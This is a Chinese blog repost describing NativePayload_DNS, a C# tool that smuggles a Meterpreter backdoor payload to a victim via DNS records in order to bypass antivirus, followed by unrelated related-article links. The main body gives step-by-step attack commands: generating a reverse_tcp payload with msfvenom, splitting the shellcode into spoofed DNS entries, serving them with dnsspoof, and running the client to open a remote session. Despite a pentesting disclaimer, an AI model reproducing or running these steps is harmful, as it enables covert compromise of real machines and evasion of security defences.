NativePayload_DNS,通过DNS流量,绕过防病毒传输后门

简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319 传送门注意标点符号,必须是英文的。
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396319

传送门

注意标点符号,必须是英文的。

通过DNS流量和绕过防病毒传输的后门有效负载的C#代码

由Damon Mohammadbagher发表

警告:此代码发布用于解释针对Pentesters和安全研究人员的反病毒漏洞

欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒文章备份地址

视频由Damon Mohammadbagher发行(bbxc9x00x1f)
绕过反病毒与DNS流量传输后门有效负载视频(需要访问YouTube)

用NativePayload_DNS和Meterpreter_Payload_Detection绕过AV视频(需要访问YouTube)

视频说明:使用NativePayload_DNS.exe绕过AV并通过Meterpreter_Payload_Detection工具检测Meterpreter进程

步骤1:

msfvenom C类型的有效负载在你的kali linux

msfvenom --platform windows -arch x86_64 -p windows/x64 /meterpreter/reverse_tcp lhost = 192.168.1.50 -fc> /root/Desktop/payload.txt

将有效载荷从payload.txt文件复制到dns.txt,格式如下:

root @ kali:〜#cat /root/Desktop/dns.txt

1.1.1.0“0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com”

1.1.1.1“0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com”

1.1.1.2“0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com”

1.1.1.3“0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com”

步骤2:在您的kali linux中制作假DNS服务器

root @ kali:〜#dnsspoof -i eth0 -f /root/Desktop/dns.txt

步骤3:

在客户端运行代码
语法:

NativePayload_DNS.exe“1.1.1”. 34“192.168.1.50”

最后你可以绕过AV,你有Meterpreter Session

欲了解更多信息,请一步一步访问以下链接:
通过DNS流量绕过带有传输后门有效负载的反病毒

通过DNS流量绕过带有传输后门有效负载的反病毒,备份地址

相关工具: 用于通过IPv6地址(AAAA)记录和DNS流量传输的Backdoor Payload的C#代码也绕过防病毒

相关链接: 用C#通过加密有效载荷绕过所有防病毒

相关文章
|
4月前
|
移动开发 JSON 监控
网络协议解析:在员工上网监控软件中实现HTTP流量分析
随着企业对员工网络活动的监控需求不断增加,开发一套能够实现HTTP流量分析的网络协议解析系统变得愈发重要。本文将深入探讨如何在员工上网监控软件中实现HTTP流量分析,通过代码示例演示关键步骤。
225 0
|
2月前
|
Web App开发 存储 网络协议
C/C++ 数据结构设计与应用(四):C++数据压缩与传输:从理论到实践的全景解析
C/C++ 数据结构设计与应用(四):C++数据压缩与传输:从理论到实践的全景解析
77 3
|
2月前
|
编解码 移动开发 C++
RTMP协议深度解析:从原理到实践,掌握实时流媒体传输技术
RTMP协议深度解析:从原理到实践,掌握实时流媒体传输技术
116 0
RTMP协议深度解析:从原理到实践,掌握实时流媒体传输技术
|
3月前
|
域名解析 缓存 网络协议
DNS问题之服务器流量被攻击如何解决
DNS服务器是负责将域名转换为IP地址的服务,它是互联网上实现域名解析的关键基础设施;本合集将探讨DNS服务器的工作原理、配置方法和常见问题处理,帮助用户理解和优化DNS服务的使用。
52 3
|
6月前
|
Kubernetes Java 双11
抗住双十一!实战Alibaba笔记,深度解析阿里微服务亿级流量治理
随着微服务的发展及DDD领域驱动设计的兴起,越来越多的企业开始使用微服务架构。为了应对微服务化带来的难题,一批微服务组件与应用涌现出来,如辅助问题排查得分布式调用链追踪探针、简化部署运维的Kubernetes,以及本书介绍的熔断器组件等。
|
7月前
|
域名解析 缓存 网络协议
DNS Rebinding Attack 绕过SSRF限制
DNS Rebinding Attack 绕过SSRF限制
|
8月前
|
Kubernetes 负载均衡 网络协议
全网最细,深度解析 Istio Ambient Mesh 流量路径
本文旨在对 Istio Ambient Mesh 的流量路径进行详细解读,力求尽可能清晰地呈现细节,以帮助读者完全理解 Istio Ambient Mesh 中最为关键的部分。
|
网络协议 Python
Python 使用Scapy操作DNS流量
通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。
303 0
|
存储 缓存 网络协议
基于TCP的DNS传输:实施要求
本文档是 Internet 工程任务组 (IETF) 的产品。它代表了 IETF 社区的共识。它已接受公众审查,并已获互联网工程指导小组 (IESG) 批准出版。有关 Internet 标准的更多信息,请参见 RFC 5741 的第 2 节。
573 0
基于TCP的DNS传输:实施要求
|
缓存 监控 网络协议
基于TCP的DNS传输:操作要求
本文档更新了RFC 1123和RFC 1536。本文档要求将允许DNS消息在Internet上通过TCP传输的操作实践作为当前最佳实践。此操作要求与RFC 7766中的实施要求一致。TCP的使用包括基于未加密TCP的DNS以及加密的TLS会话。该文件还考虑了这种形式的DNS通信的后果,以及在不支持当前最佳实践时可能出现的潜在运营问题。
376 0
基于TCP的DNS传输:操作要求

相关产品

  • 云解析DNS
  • 推荐镜像

    更多